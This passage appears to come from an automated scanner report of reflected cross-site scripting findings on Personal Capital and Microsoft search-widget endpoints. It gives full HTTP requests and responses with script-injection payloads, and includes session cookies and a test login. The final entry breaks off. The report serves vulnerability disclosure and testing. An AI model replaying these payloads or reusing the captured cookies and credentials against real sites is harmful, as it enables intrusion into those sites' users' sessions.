2.101. https://home.personalcapital.com/api/credential/authenticatePhone [challengeReason parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /api/credential/authenticatePhone

Issue detail

The value of the challengeReason request parameter is copied into the HTML document as plain text between tags. The payload 82a53<script>alert(1)</script>c9d82fda620 was submitted in the challengeReason parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /api/credential/authenticatePhone HTTP/1.1
Host: home.personalcapital.com
Connection: keep-alive
Referer: https://home.personalcapital.com/swf/SafePage.swf
Content-Length: 93
Origin: https://home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316269631-91943; REMEMBER_ME_COOKIE=""; JSESSIONID=6C783412CA0A9621A0636669CC7ECFB4; PMData=504d56334464704e565a3766784878564659566566722f63546b4747582f62644e30696c5365584c48714f3154443076464e344c43484446423965584d58646e6f44316c456870654864476278686454534e596d4d424642553650513d3d

apiClient=WEB&csrf=b65fc50a%2D9816%2D4457%2D83f7%2D2cb9eecaafc5&challengeReason=DEVICE%5FAUTH82a53<script>alert(1)</script>c9d82fda620

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:48:15 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
SP_HEADERS: {"SP_HEADER_VERSION":"1312318050754","secondFactor":false,"username":"rtfm@fastdial.net","deviceName":"Public Device","status":"ACTIVE","authLevel":"USER_IDENTIFIED","authenticated":false,"identified":true}
Set-Cookie: PMData=504d56334464704e565a3766784878564659566566722f63546b4747582f62644e30696c5365584c48714f3154443076464e344c43484446423965584d58646e6f44316c456870654864476278686454534e596d4d424642553650513d3d; Expires=Wed, 01-Aug-2012 20:48:15 GMT; Path=/; Secure
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 893
Connection: close

{"spHeader":{"SP_HEADER_VERSION":"1312318050754","secondFactor":false,"username":"rtfm@fastdial.net","errors":[{"message":"An error has occurred!","code":900},{"message":"Invalid characters entered.","details":{"originalValue":"DEVICE_AUTH82a53<script>alert(1)</script>c9d82fda620","fieldName":"challengeReason"},"code":109},{"message":"Unsupported characters entered.","details":{"originalValue":"DEVICE_AUTH82a53<script>
...[SNIP]...

2.102. https://home.personalcapital.com/api/login/identifyUser [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /api/login/identifyUser

Issue detail

The value of the username request parameter is copied into the HTML document as plain text between tags. The payload c31db<script>alert(1)</script>b73e69cbf43 was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /api/login/identifyUser HTTP/1.1
Host: home.personalcapital.com
Connection: keep-alive
Referer: https://home.personalcapital.com/swf/SafePage.swf
Content-Length: 94
Origin: https://home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=33CD996F2B3DC07EE4468D3B8B16A184; _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316269631-91943

apiClient=WEB&csrf=a95ac044%2D77a2%2D4887%2D8cf8%2D53dc0193b1d7&username=rtfm%40fastdial%2Enetc31db<script>alert(1)</script>b73e69cbf43

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:20:40 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
Set-Cookie: JSESSIONID=2007571C91A9B30468D8A70756DADCEA; Path=/; Secure
SP_HEADERS: {"SP_HEADER_VERSION":"1312316440790","secondFactor":false,"csrf":"e3811a27-f05c-4dfe-83a6-54b00a15449d","status":"NONE","authLevel":"NONE","authenticated":false,"identified":false}
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 731
Connection: close

{"spHeader":{"SP_HEADER_VERSION":"1312316440790","secondFactor":false,"csrf":"e3811a27-f05c-4dfe-83a6-54b00a15449d","errors":[{"message":"Invalid characters entered.","details":{"originalValue":"rtfm@fastdial.netc31db<script>alert(1)</script>b73e69cbf43","fieldName":"username"},"code":110},{"message":"Unsupported characters entered.","details":{"originalValue":"rtfm@fastdial.netc31db<script>
...[SNIP]...

2.103. https://home.personalcapital.com/api/registration/registerUser [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /api/registration/registerUser

Issue detail

The value of the email request parameter is copied into the HTML document as plain text between tags. The payload edf33<script>alert(1)</script>4b930307c05 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /api/registration/registerUser HTTP/1.1
Host: home.personalcapital.com
Connection: keep-alive
Referer: https://home.personalcapital.com/swf/SafePage.swf
Content-Length: 133
Origin: https://home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316269631-91943; JSESSIONID=64C9D9DA2EC586D61955445472E49BC7; PMData=504d563344642b7938465658494a4a4a50364a644954387866766c6d582f62644e30696c5365584c48714f31544430764554346570656441796872776d562b62417972412b4b53504d73342f78675a726a477a6938776344462f41513d3d

email=rtfm%40fastdial%2Enetedf33<script>alert(1)</script>4b930307c05&flags=PwEm&apiClient=WEB&csrf=b0274b13%2D047f%2D4a78%2D9c3a%2De8eb334927ff&passwd=LL123456&termsVersion=1

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:43:48 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
Set-Cookie: JSESSIONID=FF4B518E092DFED295521516D66D5C61; Path=/; Secure
SP_HEADERS: {"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","status":"NONE","authLevel":"NONE","authenticated":false,"identified":false}
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 728
Connection: close

{"spHeader":{"SP_HEADER_VERSION":"1312317828248","secondFactor":false,"csrf":"de8f5788-c607-47d0-a6a2-6e19b91eec62","errors":[{"message":"Please use a valid email address.","details":{"originalValue":"rtfm@fastdial.netedf33<script>alert(1)</script>4b930307c05","fieldName":"email"},"code":113},{"message":"Unsupported characters entered.","details":{"originalValue":"rtfm@fastdial.netedf33<script>
...[SNIP]...

2.104. https://home.personalcapital.com/api/registration/registerUser [passwd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /api/registration/registerUser

Issue detail

The value of the passwd request parameter is copied into the HTML document as plain text between tags. The payload 302a8<script>alert(1)</script>aa7570b5f14 was submitted in the passwd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /api/registration/registerUser HTTP/1.1
Host: home.personalcapital.com
Connection: keep-alive
Referer: https://home.personalcapital.com/swf/SafePage.swf
Content-Length: 133
Origin: https://home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316269631-91943; JSESSIONID=64C9D9DA2EC586D61955445472E49BC7; PMData=504d563344642b7938465658494a4a4a50364a644954387866766c6d582f62644e30696c5365584c48714f31544430764554346570656441796872776d562b62417972412b4b53504d73342f78675a726a477a6938776344462f41513d3d

email=rtfm%40fastdial%2Enet&flags=PwEm&apiClient=WEB&csrf=b0274b13%2D047f%2D4a78%2D9c3a%2De8eb334927ff&passwd=LL123456302a8<script>alert(1)</script>aa7570b5f14&termsVersion=1

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:43:48 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
Set-Cookie: JSESSIONID=2DF7E548206A4F405D96B7FEFB7245A1; Path=/; Secure
Set-Cookie: REMEMBER_ME_COOKIE=""; Expires=Wed, 01-Aug-2012 20:43:48 GMT; Path=/; Secure
SP_HEADERS: {"SP_HEADER_VERSION":"1312317829364"}
Set-Cookie: PMData=504d56334464537471596973465a7754504471434e3035444741486d582f62644e30696c5365584c48714f3154443076463852686e544154767333474774616c642f6c317a746c3654754d49666a77316a43305757503164574c67773d3d; Expires=Wed, 01-Aug-2012 20:43:49 GMT; Path=/; Secure
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 455
Connection: close

{"spHeader":{"SP_HEADER_VERSION":"1312317829364","secondFactor":true,"username":"rtfm@fastdial.net","errors":[{"message":"Too many characters in the input field.","details":{"originalValue":"LL123456302a8<script>alert(1)</script>aa7570b5f14","fieldName":"passwd"},"code":106}],"deviceName":"Public Device","status":"INACTIVE","developer":false,"authLevel":"SESSION_AUTHENTICATED","authenticated":true,"betaTester":false,"identified":true,"su
...[SNIP]...

2.105. https://home.personalcapital.com/api/registration/registerUser [termsVersion parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /api/registration/registerUser

Issue detail

The value of the termsVersion request parameter is copied into the HTML document as plain text between tags. The payload adbf7<script>alert(1)</script>439858c3c6a was submitted in the termsVersion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /api/registration/registerUser HTTP/1.1
Host: home.personalcapital.com
Connection: keep-alive
Referer: https://home.personalcapital.com/swf/SafePage.swf
Content-Length: 133
Origin: https://home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:920-GOG-506&token:_mch-personalcapital.com-1312316269631-91943; JSESSIONID=64C9D9DA2EC586D61955445472E49BC7; PMData=504d563344642b7938465658494a4a4a50364a644954387866766c6d582f62644e30696c5365584c48714f31544430764554346570656441796872776d562b62417972412b4b53504d73342f78675a726a477a6938776344462f41513d3d

email=rtfm%40fastdial%2Enet&flags=PwEm&apiClient=WEB&csrf=b0274b13%2D047f%2D4a78%2D9c3a%2De8eb334927ff&passwd=LL123456&termsVersion=1adbf7<script>alert(1)</script>439858c3c6a

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:43:49 GMT
cache-control: no-cache, no-store, must-revalidate, maxage=0
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
google-bot: noarchive
Set-Cookie: JSESSIONID=F8EDF183243929239D69F9E072600F4F; Path=/; Secure
SP_HEADERS: {"SP_HEADER_VERSION":"1312317829595","secondFactor":false,"csrf":"e0d827e1-9fea-4797-842d-5cf698a77abd","status":"NONE","authLevel":"NONE","authenticated":false,"identified":false}
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 695
Connection: close

{"spHeader":{"SP_HEADER_VERSION":"1312317829595","secondFactor":false,"csrf":"e0d827e1-9fea-4797-842d-5cf698a77abd","errors":[{"message":"Invalid characters entered.","details":{"originalValue":"1adbf7<script>alert(1)</script>439858c3c6a","fieldName":"termsVersion"},"code":110},{"message":"Unsupported characters entered.","details":{"originalValue":"1adbf7<script>
...[SNIP]...

2.106. https://home.personalcapital.com/examples/jsp/cal/cal2.jsp [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /examples/jsp/cal/cal2.jsp

Issue detail

The value of the time request parameter is copied into the name of an HTML tag attribute. The payload 84a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c was submitted in the time parameter. This input was echoed as 84a47 style=x:expression(alert(1)) 76d3929e13c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /examples/jsp/cal/cal2.jsp?time=1%20ns=alert(0x0010A4)%2084a47%20style%3dx%3aexpression(alert(1))%2076d3929e13c HTTP/1.1
Host: home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:26:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1402
Connection: close

<HTML>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding
...[SNIP]...
<INPUT NAME="time" TYPE=HIDDEN VALUE=1 ns=alert(0x0010A4) 84a47 style=x:expression(alert(1)) 76d3929e13c
<BR>
...[SNIP]...

2.107. https://home.personalcapital.com/examples/jsp/cal/cal2.jsp [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://home.personalcapital.com
Path:   /examples/jsp/cal/cal2.jsp

Issue detail

The value of the time request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 28672%20style%3dx%3aexpression(alert(1))%20402ba77607c was submitted in the time parameter. This input was echoed as 28672 style=x:expression(alert(1)) 402ba77607c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /examples/jsp/cal/cal2.jsp?time=28672%20style%3dx%3aexpression(alert(1))%20402ba77607c HTTP/1.1
Host: home.personalcapital.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=BA46212703D4F25C39A99E1396FB6FB1
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 02 Aug 2011 20:26:33 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1360
Connection: close

<HTML>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding
...[SNIP]...
<INPUT NAME="time" TYPE=HIDDEN VALUE=28672 style=x:expression(alert(1)) 402ba77607c
<BR>
...[SNIP]...

2.108. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i1.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cdb8<img%20src%3da%20onerror%3dalert(1)>8916b0dd0a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cdb8<img src=a onerror=alert(1)>8916b0dd0a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-us&Refinement=182&watermark=Windows%20Hardware&focusOnInit=false&4cdb8<img%20src%3da%20onerror%3dalert(1)>8916b0dd0a3=1 HTTP/1.1
Host: i1.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/windows/hardware/gg463012.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=9f1d1666ec7f6f4383aa85f0621e05dc&HASH=6616&LV=20117&V=3; MUID=9D76DAC5D4D147139C18D454161BD61E; mcI=Thu, 28 Jul 2011 22:51:18 GMT; s_vnum=1314903443621%26vn%3D1; s_nr=1312311501528; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1312474856377%7D%2C%22lastinvited%22%3A1312474856377%2C%22userid%22%3A%2213124748563777579888615291566%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=54d36fa2-a84f-4fde-b3e2-ba73f93558f6&Microsoft.CreationDate=08/04/2011 16:20:01&Microsoft.LastVisitDate=08/04/2011 16:21:27&Microsoft.NumberOfVisits=6&SessionCookie.Id=5D3A8D2644992D448AFAA24E31B70026; MSID=Microsoft.CreationDate=07/21/2011 22:50:10&Microsoft.LastVisitDate=08/04/2011 16:21:27&Microsoft.VisitStartDate=08/04/2011 16:20:01&Microsoft.CookieId=1f3c966e-de93-48a0-a622-dd22c1d969f7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=20&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0656-4650-6340-5940; MS0=b2fdbf8fd7bd414b9d8764f88f181e67; omniID=1312474778371_ca1f_74c4_9668_7286adce6a18; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=50.23.123.106-2332126736.30164984:lv=1312464665930:ss=1312463978449; A=I&I=AxUFAAAAAAAHCQAAx1Z4lQNJvBQ8e16kLoylLg!!&GO=122&M=1

Response

HTTP/1.1 200 OK
ntCoent-Length: 12994
Content-Type: application/x-javascript
ETag: d68b8b3868d1cc3454a4ba2920a2ee94
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Content-Length: 12994
Cache-Control: public, max-age=43200
Expires: Sun, 07 Aug 2011 13:23:28 GMT
Date: Sun, 07 Aug 2011 01:23:28 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
EmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&Refinement=182&4cdb8<img src=a onerror=alert(1)>8916b0dd0a3=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Window
...[SNIP]...

2.109. http://i2.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i2.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12673<img%20src%3da%20onerror%3dalert(1)>877390d11ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12673<img src=a onerror=alert(1)>877390d11ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=TechNet&loc=en-us&watermark=TechNet&focusOnInit=false&12673<img%20src%3da%20onerror%3dalert(1)>877390d11ec=1 HTTP/1.1
Host: i2.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/sysinternals/bb896647.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=9f1d1666ec7f6f4383aa85f0621e05dc&HASH=6616&LV=20117&V=3; MUID=9D76DAC5D4D147139C18D454161BD61E; mcI=Thu, 28 Jul 2011 22:51:18 GMT; s_vnum=1314903443621%26vn%3D1; s_nr=1312311501528; omniID=1312474778371_ca1f_74c4_9668_7286adce6a18; s_cc=true; WT_NVR_RU=0=msdn:1=:2=; s_sq=%5B%5BB%5D%5D; WT_FPC=id=50.23.123.106-2332126736.30164984:lv=1312463999958:ss=1312463978449; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=54d36fa2-a84f-4fde-b3e2-ba73f93558f6&Microsoft.CreationDate=08/04/2011 16:20:01&Microsoft.LastVisitDate=08/04/2011 16:20:01&Microsoft.NumberOfVisits=1&SessionCookie.Id=5D3A8D2644992D448AFAA24E31B70026; MSID=Microsoft.CreationDate=07/21/2011 22:50:10&Microsoft.LastVisitDate=08/04/2011 16:20:01&Microsoft.VisitStartDate=08/04/2011 16:20:01&Microsoft.CookieId=1f3c966e-de93-48a0-a622-dd22c1d969f7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=15&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0656-4650-6340-5940; MS0=b2fdbf8fd7bd414b9d8764f88f181e67; A=I&I=AxUFAAAAAABQCQAA4nZP70ZMQSTkREKW5VNgAQ!!&GO=122&M=1

Response

HTTP/1.1 200 OK
ntCoent-Length: 12973
Content-Type: application/x-javascript
ETag: ed3efaf8cbef8f2ec12fb308aa577174
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Content-Length: 12973
Cache-Control: public, max-age=43200
Expires: Fri, 05 Aug 2011 04:20:15 GMT
Date: Thu, 04 Aug 2011 16:20:15 GMT
Connection: close
Vary: Accept-Encoding


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"2","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&12673<img src=a onerror=alert(1)>877390d11ec=1","scopeId":"9","searchLocation":"http:\/\/social.TechNet.microsoft.com\/Search\/en-US","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search Tec
...[SNIP]...

2.110. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i3.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62274<img%20src%3da%20onerror%3dalert(1)>e64046ddfb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62274<img src=a onerror=alert(1)>e64046ddfb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/Widgets/SearchBox.jss?boxid=HeaderSearchTextBox&btnid=HeaderSearchButton&brand=MSDN&loc=en-ie&watermark=MSDN&focusOnInit=false&62274<img%20src%3da%20onerror%3dalert(1)>e64046ddfb0=1 HTTP/1.1
Host: i3.services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-ie/hh370980.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1312413844063:ss=1312413837678; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244; MUID=07A84762A59063DC03DB4555A090635D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=08/04/2011 02:15:45&Microsoft.VisitStartDate=08/04/2011 02:10:30&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=10&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200036905-8/3/2011 11:30:42; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=0dc92cfb-949d-4207-b7f9-962ff42efcea&Microsoft.CreationDate=08/04/2011 02:10:30&Microsoft.LastVisitDate=08/04/2011 02:15:45&Microsoft.NumberOfVisits=3&SessionCookie.Id=80B23ADEFFD29E59007E6B9DA4BC76B1; MS0=ed2d779f0f6c4aa197665a8c8252f3d6; mcI=Thu%2C%2011%20Aug%202011%2002%3A24%3A04%20GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: 9bdeb11e4493d38cbbd74dd9e776d9c4
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB36
Vary: Accept-Encoding
Cache-Control: public, max-age=43200
Expires: Thu, 04 Aug 2011 14:24:16 GMT
Date: Thu, 04 Aug 2011 02:24:16 GMT
Content-Length: 12967
Connection: close


if (typeof epx_core === 'undefined') {
epx_loaded = false;
epx_core = function(s) {this.s = s;}
epx_core.prototype = {
exec: function(func, checkFunc, retry) {
if (retry) retry++; else retry =
...[SNIP]...
archBox({"allowEmptySearch":false,"appId":"1","boxId":"HeaderSearchTextBox","btnId":"HeaderSearchButton","focusOnInit":false,"maxTerms":null,"minimumTermLength":4,"paramsCallback":null,"queryParams":"&62274<img src=a onerror=alert(1)>e64046ddfb0=1","scopeId":"9","searchLocation":"http:\/\/social.MSDN.microsoft.com\/Search\/en-IE","serviceUri":"http:\/\/services.social.microsoft.com\/Search\/","sr":{"close":"Close","searchLabel":"Search MSDN w
...[SNIP]...

2.111. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i4.services.social.microsoft.com
Path:   /search/Widgets/SearchBox.jss

Issue detail

